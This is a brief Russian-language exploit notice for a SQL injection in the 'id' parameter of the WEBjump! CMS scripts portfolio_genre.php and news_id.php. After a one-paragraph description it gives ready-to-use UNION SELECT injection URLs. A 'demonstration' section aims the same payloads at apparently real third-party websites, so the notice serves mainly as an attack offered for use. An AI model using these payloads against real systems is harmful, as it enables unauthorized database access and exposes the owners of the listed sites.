Программа: CMS WEBjump!
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения. Уязвимость существует из-за недостаточной
обработки входных данных в параметре «id» сценариями portfolio_genre.php и
news_id.php. Удаленный пользователь может с помощью специально сформированного
запроса выполнить произвольные SQL команды в базе данных приложения.
Эксплоит:
www.sute.com/portfolio_genre.php?id=-67%20union%20select%201,2,@@version--
Демонстрация:
http://www.leti.cz/portfolio_genre.php?id=-67%20union%20select%201,2,@@version--
www.sute.com/path/news_id.php?lang=en&id=-92%20union%20select%201,2,3,@@version,5--
http://tower.klif.pl/content/news_id.php?lang=en&id=-92%20union%20select%201,2,3,@@version,5--
